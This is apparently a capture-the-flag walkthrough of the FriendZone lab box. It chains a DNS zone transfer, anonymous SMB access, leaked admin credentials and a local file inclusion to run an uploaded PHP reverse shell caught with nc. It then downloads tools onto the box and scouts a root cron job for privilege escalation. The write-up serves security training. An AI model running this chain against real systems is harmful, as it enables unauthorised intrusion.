$ sudo nmap -A -T4 -p- 10.10.10.123
[sudo] password for ruben:
Starting Nmap 7.80 ( https://nmap.org ) at 2020-10-01 09:43 CEST
Nmap scan report for 10.10.10.123
Host is up (0.053s latency).
Not shown: 65528 closed ports
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 a9:68:24:bc:97:1f:1e:54:a5:80:45:e7:4c:d9:aa:a0 (RSA)
| 256 e5:44:01:46:ee:7a:bb:7c:e9:1a:cb:14:99:9e:2b:8e (ECDSA)
|_ 256 00:4e:1a:4f:33:e8:a0:de:86:a6:e4:2a:5f:84:61:2b (ED25519)
53/tcp open domain ISC BIND 9.11.3-1ubuntu1.2 (Ubuntu Linux)
| dns-nsid:
|_ bind.version: 9.11.3-1ubuntu1.2-Ubuntu
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Friend Zone Escape software
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
443/tcp open ssl/http Apache httpd 2.4.29
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: 404 Not Found
| ssl-cert: Subject: commonName=friendzone.red/organizationName=CODERED/stateOrProvinceName=CODERED/countryName=JO
| Not valid before: 2018-10-05T21:02:30
|_Not valid after: 2018-11-04T21:02:30
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.80%E=4%D=10/1%OT=21%CT=1%CU=40427%PV=Y%DS=2%DC=T%G=Y%TM=5F7588E
OS:0%P=x86_64-pc-linux-gnu)SEQ(SP=100%GCD=1%ISR=10A%TI=Z%CI=I%II=I%TS=A)OPS
OS:(O1=M54DST11NW7%O2=M54DST11NW7%O3=M54DNNT11NW7%O4=M54DST11NW7%O5=M54DST1
OS:1NW7%O6=M54DST11)WIN(W1=7120%W2=7120%W3=7120%W4=7120%W5=7120%W6=7120)ECN
OS:(R=Y%DF=Y%T=40%W=7210%O=M54DNNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)U1(R=Y%DF=N%
OS:T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD
OS:=S)
Network Distance: 2 hops
Service Info: Hosts: FRIENDZONE, 127.0.0.1; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
Host script results:
|_clock-skew: mean: -1h00m00s, deviation: 1h43m54s, median: -1s
|_nbstat: NetBIOS name: FRIENDZONE, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: friendzone
| NetBIOS computer name: FRIENDZONE\x00
| Domain name: \x00
| FQDN: friendzone
|_ System time: 2020-10-01T10:44:24+03:00
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-10-01T07:44:23
|_ start_date: N/A
TRACEROUTE (using port 3306/tcp)
HOP RTT ADDRESS
1 96.36 ms 10.10.14.1
2 96.82 ms 10.10.10.123
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 87.10 seconds
$ gobuster -w /usr/share/wordlists/dirb/common.txt dir -u http://10.10.10.123/
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://10.10.10.123/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/10/08 16:55:12 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/.hta (Status: 403)
/index.html (Status: 200)
/robots.txt (Status: 200)
/server-status (Status: 403)
/wordpress (Status: 301)
===============================================================
2020/10/08 16:55:35 Finished
===============================================================
Access to http://10.10.10.123

Acess to https://10.10.10.123/

We discovered that SSL cert is using a common name as friendzone.red (it is a vhost).
So we can access then to https://friendzone.red/ (after this host was added to the /etc/host file)

We can do a zone transfer for that domain I saw earlier on the main page and get the list of all sub-domains.
More info about DNS Zone Transfers can be found here: https://www.acunetix.com/blog/articles/dns-zone-transfers-axfr/
$ dig axfr friendzone.red @10.10.10.123
; <<>> DiG 9.16.6-Debian <<>> axfr friendzone.red @10.10.10.123
;; global options: +cmd
friendzone.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800
friendzone.red. 604800 IN AAAA ::1
friendzone.red. 604800 IN NS localhost.
friendzone.red. 604800 IN A 127.0.0.1
administrator1.friendzone.red. 604800 IN A 127.0.0.1
hr.friendzone.red. 604800 IN A 127.0.0.1
uploads.friendzone.red. 604800 IN A 127.0.0.1
friendzone.red. 604800 IN SOA localhost. root.localhost. 2 604800 86400 2419200 604800
;; Query time: 44 msec
;; SERVER: 10.10.10.123#53(10.10.10.123)
;; WHEN: jue oct 01 11:29:39 CEST 2020
;; XFR size: 8 records (messages 1, bytes 289)
VHosts found:
- friendzone.red
- administrator1.friendzone.red
- hr.friendzone.red
- uploads.friendzone.red
These virtual hosts need to be added to the host file.
As we have SMB available, we can start to enumerate which shares we have available.
$ smbclient -N -L //10.10.10.123
Sharename Type Comment
--------- ---- -------
print$ Disk Printer Drivers
Files Disk FriendZone Samba Server Files /etc/Files
general Disk FriendZone Samba Server Files
Development Disk FriendZone Samba Server Files
IPC$ IPC IPC Service (FriendZone server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available
$ smbmap -H 10.10.10.123
[+] Guest session IP: 10.10.10.123:445 Name: friendzone.htb
Disk Permissions Comment
---- ----------- -------
print$ NO ACCESS Printer Drivers
Files NO ACCESS FriendZone Samba Server Files /etc/Files
general READ ONLY FriendZone Samba Server Files
Development READ, WRITE FriendZone Samba Server Files
IPC$ NO ACCESS IPC Service (FriendZone server (Samba, Ubuntu))
Only general and Development can be accessed.
Development share can also be used to upload a file.
$ smbclient -N \\10.10.10.123\Files
tree connect failed: NT_STATUS_ACCESS_DENIED
$ smbclient -N \\10.10.10.123\general
Try "help" to get a list of possible commands.
smb: \> dir
smb: > dir
. D 0 Wed Jan 16 21:10:51 2019
.. D 0 Wed Jan 23 22:51:02 2019
creds.txt N 57 Wed Oct 10 01:52:42 2018
9221460 blocks of size 1024. 6459256 blocks available
smb: > get creds.txt
getting file \creds.txt of size 57 as creds.txt (0,3 KiloBytes/sec) (average 0,3 KiloBytes/sec)
smb: > cd ..
smb: > exit
$ smbclient -N \\10.10.10.123\Development
Try "help" to get a list of possible commands.
smb: \>
smb: > dir
. D 0 Wed Jan 16 21:03:49 2019
.. D 0 Wed Jan 23 22:51:02 2019
9221460 blocks of size 1024. 6459256 blocks available
$ cat creds.txt
creds for the admin THING:
admin:WORKWORKHhallelujah@#
Running also autorecon we found some interesting elements:
smb-enum-shares:
| account_used: guest
| \\10.10.10.123\Development:
| Type: STYPE_DISKTREE
| Comment: FriendZone Samba Server Files
| Users: 3
| Max Users: <unlimited>
| Path: C:\etc\Development
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.10.123\Files:
| Type: STYPE_DISKTREE
| Comment: FriendZone Samba Server Files /etc/Files
| Users: 0
| Max Users: <unlimited>
| Path: C:\etc\hole
| Anonymous access: <none>
| Current user access: <none>
| \\10.10.10.123\IPC$:
| Type: STYPE_IPC_HIDDEN
| Comment: IPC Service (FriendZone server (Samba, Ubuntu))
| Users: 5
| Max Users: <unlimited>
| Path: C:\tmp
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.10.123\general:
| Type: STYPE_DISKTREE
| Comment: FriendZone Samba Server Files
| Users: 1
| Max Users: <unlimited>
| Path: C:\etc\general
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
| \\10.10.10.123\print$:
| Type: STYPE_DISKTREE
| Comment: Printer Drivers
| Users: 0
| Max Users: <unlimited>
| Path: C:\var\lib\samba\printers
| Anonymous access: <none>
|_ Current user access: <none>
We know the paths of the SMB shares:
- Path: C:\etc\Development
- Path: C:\etc\hole
- Path: C:\tmp
- Path: C:\etc\general
- Path: C:\var\lib\samba\printers
As we discovered different vhosts, we can also run gobuster with them.
$ gobuster -w /usr/share/wordlists/dirb/common.txt dir -u https://friendzone.red/ -k
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: https://friendzone.red/
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirb/common.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/10/08 16:56:44 Starting gobuster
===============================================================
/.hta (Status: 403)
/.htaccess (Status: 403)
/.htpasswd (Status: 403)
/admin (Status: 301)
/index.html (Status: 200)
/js (Status: 301)
/server-status (Status: 403)
===============================================================
2020/10/08 16:57:06 Finished
===============================================================
$ gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt dir -u
https://administrator1.friendzone.red -k -x .php
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: https://administrator1.friendzone.red
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php
[+] Timeout: 10s
===============================================================
2020/10/08 17:37:03 Starting gobuster
===============================================================
/images (Status: 301)
/login.php (Status: 200)
/dashboard.php (Status: 200)
/timestamp.php (Status: 200)
===============================================================
2020/10/08 17:52:06 Finished
===============================================================
$ gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt dir -u https://hr.friendzone.red -k
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: https://hr.friendzone.red
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/10/08 18:10:47 Starting gobuster
===============================================================
===============================================================
2020/10/08 18:18:41 Finished
===============================================================
$ gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt dir -u https://hr.friendzone.red -k -x .php
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: https://hr.friendzone.red
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php
[+] Timeout: 10s
===============================================================
2020/10/08 17:52:45 Starting gobuster
===============================================================
===============================================================
2020/10/08 18:09:10 Finished
===============================================================
$ gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt dir -u https://uploads.friendzone.red -k
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: https://uploads.friendzone.red
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/10/08 18:19:09 Starting gobuster
===============================================================
/files (Status: 301)
===============================================================
2020/10/08 18:26:50 Finished
===============================================================
$ gobuster -w /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt dir -u https://uploads.friendzone.red -k -x .php
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: https://uploads.friendzone.red
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php
[+] Timeout: 10s
===============================================================
2020/10/08 18:27:04 Starting gobuster
===============================================================
/files (Status: 301)
/upload.php (Status: 200)
===============================================================
2020/10/08 18:42:22 Finished
===============================================================
Access to https://administrator1.friendzone.red
Use credentials found previously (admin:WORKWORKHhallelujah@#)
You’ll be redirected to:
https://administrator1.friendzone.red/login.php
Login Done ! visit /dashboard.php
Let’s visit this page:
https://administrator1.friendzone.red/dashboard.php

Try what they suggest us to do:
https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=pagename

https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=timestamp

https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=login
If we analyze these parameters:
image_id: Contains the image of the web
https://administrator1.friendzone.red/images/a.jpg
pagename: Seems to load the name of the php file you use as a parameter (login, timestamp…)
We have a Local File Inclusion vulnerability.
https://en.wikipedia.org/wiki/File_inclusion_vulnerability
Then.. could we use this finding to try to upload a file to the system and run it? Maybe a remote shell?
Remembering the autorecon results:
| \\10.10.10.123\Development:
| Type: STYPE_DISKTREE
| Comment: FriendZone Samba Server Files
| Users: 3
| Max Users: <unlimited>
| Path: C:\etc\Development
| Anonymous access: READ/WRITE
| Current user access: READ/WRITE
We can upload the remote shell to this share and try to access to the file from the URL.
The common pestmonkey php reverse shell will do the trick.
We just need to change the IP and the desired port.

$ smbclient -N \\10.10.10.123\Development
smb: > put shell.php
putting file shell.php as \shell.php (20,6 kb/s) (average 20,6 kb/s)
smb: \>
https://administrator1.friendzone.red/dashboard.php?image_id=a.jpg&pagename=/etc/Development/shell
$ nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.14.12] from (UNKNOWN) [10.10.10.123] 43440
Linux FriendZone 4.15.0-36-generic #39-Ubuntu SMP Mon Sep 24 16:19:09 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
13:27:23 up 22 min, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$
We can improve our shell:
$ python3 -c "import pty;pty.spawn('/bin/bash')"
www-data@FriendZone:/$
www-data@FriendZone:/$ whoami
www-data
www-data@FriendZone:/$ cd /home
www-data@FriendZone:/home$ ls
friend
www-data@FriendZone:/home/friend$ cat user.txt
a9edXXXXXXXXXXXXXXXXXXXXXXXXXXXX
We can run pspy to start the enumeration to analyze how we can perform a privilege escalation.
(https://github.com/DominicBreuker/pspy)
pspy is a command line tool designed to snoop on processes without need for root permissions. It allows you to see commands run by other users, cron jobs, etc. as they execute.
As we are in an x64 bits system,
www-data@FriendZone:/home/friend$ uname -a
Linux FriendZone 4.15.0-36-generic #39-Ubuntu SMP Mon Sep 24 16:19:09 UTC 2018 x86_64 x86_64 x86_64 GNU/Linux
We can use the x64 bits version of the pspy script.
https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64
$ wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64
--2020-10-10 12:52:08-- https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64
Resolviendo github.com (github.com)... 140.82.121.3
Conectando con github.com (github.com)[140.82.121.3]:443... conectado.
Petición HTTP enviada, esperando respuesta... 302 Found
Localización: https://github-production-release-asset-2e65be.s3.amazonaws.com/120821432/d54f2200-c51c-11e9-8d82-f178cd27b2cb?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIWNJYAX4CSVEH53A%2F20201010%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20201010T105213Z&X-Amz-Expires=300&X-Amz-Signature=17c6be9e3625356c13d2a32baa8e094d364104f00b76ee4ad185d443de096a83&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=120821432&response-content-disposition=attachment%3B%20filename%3Dpspy64&response-content-type=application%2Foctet-stream [siguiendo]
--2020-10-10 12:52:13-- https://github-production-release-asset-2e65be.s3.amazonaws.com/120821432/d54f2200-c51c-11e9-8d82-f178cd27b2cb?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=AKIAIWNJYAX4CSVEH53A%2F20201010%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20201010T105213Z&X-Amz-Expires=300&X-Amz-Signature=17c6be9e3625356c13d2a32baa8e094d364104f00b76ee4ad185d443de096a83&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=120821432&response-content-disposition=attachment%3B%20filename%3Dpspy64&response-content-type=application%2Foctet-stream
Resolviendo github-production-release-asset-2e65be.s3.amazonaws.com (github-production-release-asset-2e65be.s3.amazonaws.com)... 52.216.154.44
Conectando con github-production-release-asset-2e65be.s3.amazonaws.com (github-production-release-asset-2e65be.s3.amazonaws.com)[52.216.154.44]:443... conectado.
Petición HTTP enviada, esperando respuesta... 200 OK
Longitud: 3078592 (2,9M) [application/octet-stream]
Grabando a: “pspy64”
pspy64 100%[======================>] 2,94M 606KB/s en 6,7s
2020-10-10 12:52:21 (450 KB/s) - “pspy64” guardado [3078592/3078592]
$ python -m SimpleHTTPServer 8080
www-data@FriendZone:/etc/Development$ wget http://10.10.14.12:8080/pspy64 pspy64
<lopment$ wget http://10.10.14.12:8080/pspy64 pspy64
--2020-10-10 13:55:56-- http://10.10.14.12:8080/pspy64
Connecting to 10.10.14.12:8080... connected.
HTTP request sent, awaiting response... 200 OK
Length: 3078592 (2.9M) [application/octet-stream]
Saving to: 'pspy64'
pspy64 0%
[ ] 0 --.-KB/s pspy64 0%
[ ] 15.58K 59.8KB/s pspy64 2%
[ ] 87.29K 179KB/s pspy64 4%
[ ] 141.14K 202KB/s pspy64 6%
[> ] 187.11K 207KB/s pspy64 8%
[> ] 252.78K 222KB/s pspy64 10%
[=> ] 311.89K 229KB/s pspy64 12%
[=> ] 378.88K 237KB/s pspy64 14%
[=> ] 441.92K 245KB/s pspy64 17%
[==> ] 528.61K 259KB/s pspy64 19%
[==> ] 599.54K 268KB/s pspy64 22%
[===> ] 686.57K 275KB/s pspy64 26%
[====> ] 790.33K 290KB/s pspy64 28%
[====> ] 869.14K 294KB/s pspy64 32%
[=====> ] 979.47K 308KB/s etpspy64 35%
[======> ] 1.04M 317KB/s etpspy64 39%
[======> ] 1.16M 353KB/s etpspy64 42%
[=======> ] 1.26M 362KB/s etpspy64 46%
[========> ] 1.36M 377KB/s etpspy64 50%
[=========> ] 1.48M 405KB/s etpspy64 53%
[=========> ] 1.58M 417KB/s etpspy64 58%
[==========> ] 1.73M 441KB/s etpspy64 64%
[===========> ] 1.89M 471KB/s etpspy64 69%
[============> ] 2.03M 505KB/s etpspy64 73%
[=============> ] 2.16M 522KB/s etpspy64 79%
[==============> ] 2.35M 552KB/s etpspy64 84%
[===============> ] 2.47M 571KB/s etpspy64 90%
[=================> ] 2.65M 601KB/s etpspy64 94%
[=================> ] 2.78M 612KB/s etpspy64 100%
[===================>] 2.94M 639KB/s in 6.3s
2020-10-10 13:56:02 (478 KB/s) - 'pspy64' saved [3078592/3078592]
--2020-10-10 13:56:02-- http://pspy64/
Resolving pspy64 (pspy64)... failed: Temporary failure in name resolution.
wget: unable to resolve host address 'pspy64'
FINISHED --2020-10-10 13:56:02--
Total wall clock time: 6.9s
Downloaded: 1 files, 2.9M in 6.3s (478 KB/s)
www-data@FriendZone:/etc/Development$
www-data@FriendZone:/etc/Development$ ls
pspy64 reverse-shell.php shell.php
www-data@FriendZone:/etc/Development$ chmod +x pspy64
www-data@FriendZone:/etc/Development$ ./pspy64
pspy - version: v1.2.0 - Commit SHA: 9c63e5d6c58f7bcdc235db663f5e3fe1c33b8855
Config: Printing events (colored=true): processes=true | file-system-events=false ||| Scannning for processes every 100ms and on inotify events ||| Watching directories: [/usr /tmp /etc /home /var /opt] (recursive) | [] (non-recursive)
Draining file system events due to startup...
done
2020/10/10 13:57:56 CMD: UID=0 PID=996 | /usr/sbin/smbd --foreground --no-process-group
2020/10/10 13:57:56 CMD: UID=0 PID=988 | /usr/sbin/smbd --foreground --no-process-group
2020/10/10 13:57:56 CMD: UID=0 PID=98 |
2020/10/10 13:57:56 CMD: UID=0 PID=929 | /usr/sbin/smbd --foreground --no-process-group
2020/10/10 13:57:56 CMD: UID=0 PID=9 |
2020/10/10 13:57:56 CMD: UID=0 PID=89 |
2020/10/10 13:57:56 CMD: UID=107 PID=853 | /usr/sbin/exim4 -bd -q30m
2020/10/10 13:57:56 CMD: UID=0 PID=85 |
2020/10/10 13:57:56 CMD: UID=0 PID=849 | /usr/sbin/smbd --foreground --no-process-group
2020/10/10 13:57:56 CMD: UID=0 PID=844 | /usr/sbin/smbd --foreground --no-process-group
2020/10/10 13:57:56 CMD: UID=0 PID=843 | /usr/sbin/smbd --foreground --no-process-group
2020/10/10 13:57:56 CMD: UID=0 PID=82 |
2020/10/10 13:57:56 CMD: UID=0 PID=81 |
2020/10/10 13:57:56 CMD: UID=0 PID=80 |
2020/10/10 13:57:56 CMD: UID=0 PID=8 |
2020/10/10 13:57:56 CMD: UID=0 PID=79 |
2020/10/10 13:57:56 CMD: UID=0 PID=78 |
2020/10/10 13:57:56 CMD: UID=0 PID=77 |
2020/10/10 13:57:56 CMD: UID=0 PID=741 | /usr/sbin/smbd --foreground --no-process-group
2020/10/10 13:57:56 CMD: UID=0 PID=7 |
2020/10/10 13:57:56 CMD: UID=0 PID=6 |
2020/10/10 13:57:56 CMD: UID=0 PID=566 | /usr/sbin/nmbd --foreground --no-process-group
2020/10/10 13:57:56 CMD: UID=33 PID=527 | /usr/sbin/apache2 -k start
2020/10/10 13:57:56 CMD: UID=33 PID=526 | /usr/sbin/apache2 -k start
2020/10/10 13:57:56 CMD: UID=33 PID=525 | /usr/sbin/apache2 -k start
2020/10/10 13:57:56 CMD: UID=33 PID=524 | /usr/sbin/apache2 -k start
2020/10/10 13:57:56 CMD: UID=33 PID=523 | /usr/sbin/apache2 -k start
2020/10/10 13:57:56 CMD: UID=0 PID=513 | /usr/sbin/apache2 -k start
2020/10/10 13:57:56 CMD: UID=0 PID=485 | /sbin/agetty -o -p -- \u --noclear tty1 linux
2020/10/10 13:57:56 CMD: UID=0 PID=473 | /usr/sbin/sshd -D
2020/10/10 13:57:56 CMD: UID=0 PID=467 | /usr/sbin/vsftpd /etc/vsftpd.conf
2020/10/10 13:57:56 CMD: UID=109 PID=455 | /usr/sbin/named -f -4 -u bind
2020/10/10 13:57:56 CMD: UID=0 PID=4 |
2020/10/10 13:57:56 CMD: UID=0 PID=381 | /usr/bin/VGAuthService
2020/10/10 13:57:56 CMD: UID=0 PID=380 | /usr/bin/python3 /usr/bin/networkd-dispatcher --run-startup-triggers
2020/10/10 13:57:56 CMD: UID=102 PID=379 | /usr/sbin/rsyslogd -n
2020/10/10 13:57:56 CMD: UID=103 PID=374 | /usr/bin/dbus-daemon --system --address=systemd: --nofork --nopidfile --systemd-activation --syslog-only
2020/10/10 13:57:56 CMD: UID=0 PID=373 | /usr/lib/accountsservice/accounts-daemon
2020/10/10 13:57:56 CMD: UID=0 PID=371 | /lib/systemd/systemd-logind
2020/10/10 13:57:56 CMD: UID=0 PID=370 | /usr/sbin/cron -f
2020/10/10 13:57:56 CMD: UID=62583 PID=364 | /lib/systemd/systemd-timesyncd
2020/10/10 13:57:56 CMD: UID=101 PID=362 | /lib/systemd/systemd-resolved
2020/10/10 13:57:56 CMD: UID=0 PID=35 |
2020/10/10 13:57:56 CMD: UID=0 PID=34 |
2020/10/10 13:57:56 CMD: UID=0 PID=32 |
2020/10/10 13:57:56 CMD: UID=0 PID=30 |
2020/10/10 13:57:56 CMD: UID=0 PID=29 |
2020/10/10 13:57:56 CMD: UID=0 PID=28 |
2020/10/10 13:57:56 CMD: UID=0 PID=27 |
2020/10/10 13:57:56 CMD: UID=100 PID=267 | /lib/systemd/systemd-networkd
2020/10/10 13:57:56 CMD: UID=0 PID=260 | /lib/systemd/systemd-udevd
2020/10/10 13:57:56 CMD: UID=0 PID=26 |
2020/10/10 13:57:56 CMD: UID=0 PID=25 |
2020/10/10 13:57:56 CMD: UID=0 PID=24 |
2020/10/10 13:57:56 CMD: UID=0 PID=23 |
2020/10/10 13:57:56 CMD: UID=0 PID=227 | /lib/systemd/systemd-journald
2020/10/10 13:57:56 CMD: UID=0 PID=223 | /usr/bin/vmtoolsd
2020/10/10 13:57:56 CMD: UID=0 PID=22 |
2020/10/10 13:57:56 CMD: UID=0 PID=21 |
2020/10/10 13:57:56 CMD: UID=0 PID=20 |
2020/10/10 13:57:56 CMD: UID=0 PID=2 |
2020/10/10 13:57:56 CMD: UID=0 PID=196 |
2020/10/10 13:57:56 CMD: UID=0 PID=195 |
2020/10/10 13:57:56 CMD: UID=0 PID=19 |
2020/10/10 13:57:56 CMD: UID=0 PID=18 |
2020/10/10 13:57:56 CMD: UID=0 PID=175 |
2020/10/10 13:57:56 CMD: UID=0 PID=174 |
2020/10/10 13:57:56 CMD: UID=0 PID=172 |
2020/10/10 13:57:56 CMD: UID=0 PID=170 |
2020/10/10 13:57:56 CMD: UID=0 PID=17 |
2020/10/10 13:57:56 CMD: UID=0 PID=169 |
2020/10/10 13:57:56 CMD: UID=0 PID=168 |
2020/10/10 13:57:56 CMD: UID=0 PID=16 |
2020/10/10 13:57:56 CMD: UID=0 PID=15 |
2020/10/10 13:57:56 CMD: UID=0 PID=14 |
2020/10/10 13:57:56 CMD: UID=0 PID=13 |
2020/10/10 13:57:56 CMD: UID=33 PID=1204 | ./pspy64
2020/10/10 13:57:56 CMD: UID=0 PID=1200 |
2020/10/10 13:57:56 CMD: UID=0 PID=12 |
2020/10/10 13:57:56 CMD: UID=0 PID=1153 |
2020/10/10 13:57:56 CMD: UID=0 PID=115 |
2020/10/10 13:57:56 CMD: UID=0 PID=11 |
2020/10/10 13:57:56 CMD: UID=0 PID=1078 |
2020/10/10 13:57:56 CMD: UID=33 PID=1042 | /bin/bash
2020/10/10 13:57:56 CMD: UID=33 PID=1041 | python3 -c import pty;pty.spawn('/bin/bash')
2020/10/10 13:57:56 CMD: UID=33 PID=1040 | /bin/sh -i
2020/10/10 13:57:56 CMD: UID=33 PID=1036 | sh -c uname -a; w; id; /bin/sh -i
2020/10/10 13:57:56 CMD: UID=33 PID=1027 | /usr/sbin/apache2 -k start
2020/10/10 13:57:56 CMD: UID=33 PID=1026 | /usr/sbin/apache2 -k start
2020/10/10 13:57:56 CMD: UID=0 PID=10 |
2020/10/10 13:57:56 CMD: UID=0 PID=1 | /sbin/init splash
2020/10/10 13:58:01 CMD: UID=0 PID=1214 | /usr/bin/python /opt/server_admin/reporter.py
2020/10/10 13:58:01 CMD: UID=0 PID=1213 | /bin/sh -c /opt/server_admin/reporter.py
2020/10/10 13:58:01 CMD: UID=0 PID=1212 | /usr/sbin/CRON -f
2020/10/10 14:00:01 CMD: UID=0 PID=1217 | /usr/bin/python /opt/server_admin/reporter.py
2020/10/10 14:00:01 CMD: UID=0 PID=1216 | /bin/sh -c /opt/server_admin/reporter.py
2020/10/10 14:00:01 CMD: UID=0 PID=1215 | /usr/sbin/CRON -f
2020/10/10 14:02:01 CMD: UID=0 PID=1220 | /bin/sh -c /opt/server_admin/reporter.py
2020/10/10 14:02:01 CMD: UID=0 PID=1219 | /bin/sh -c /opt/server_admin/reporter.py
2020/10/10 14:02:01 CMD: UID=0 PID=1218 | /usr/sbin/CRON -f
2020/10/10 14:03:00 CMD: UID=0 PID=1222 |
2020/10/10 14:04:01 CMD: UID=0 PID=1225 | /usr/bin/python /opt/server_admin/reporter.py
2020/10/10 14:04:01 CMD: UID=0 PID=1224 | /bin/sh -c /opt/server_admin/reporter.py
2020/10/10 14:04:01 CMD: UID=0 PID=1223 | /usr/sbin/CRON -f
2020/10/10 14:05:15 CMD: UID=0 PID=1226 | /usr/sbin/nmbd --foreground --no-process-group
2020/10/10 14:05:16 CMD: UID=0 PID=1227 | /usr/sbin/exim4 -qG
2020/10/10 14:06:01 CMD: UID=0 PID=1231 | /usr/bin/python /opt/server_admin/reporter.py
2020/10/10 14:06:01 CMD: UID=0 PID=1230 | /bin/sh -c /opt/server_admin/reporter.py
2020/10/10 14:06:01 CMD: UID=0 PID=1229 | /usr/sbin/CRON -f
There is this script that is running as root.
friend@FriendZone:/opt/server_admin$ cat reporter.py
#!/usr/bin/python
import os
to_address = "admin1@friendzone.com"
from_address = "admin2@friendzone.com"
print "[+] Trying to send email to %s"%to_address
#command = ''' mailsend -to admin2@friendzone.com -from admin1@friendzone.com -ssl -port 465 -auth -smtp smtp.gmail.co-sub scheduled results email +cc +bc -v -user you -pass "PAPAP"'''
#os.system(command)
# I need to edit the script later
# Sam ~ python developer
If we also run LinEnum we can find that os.py is a file writable by all.
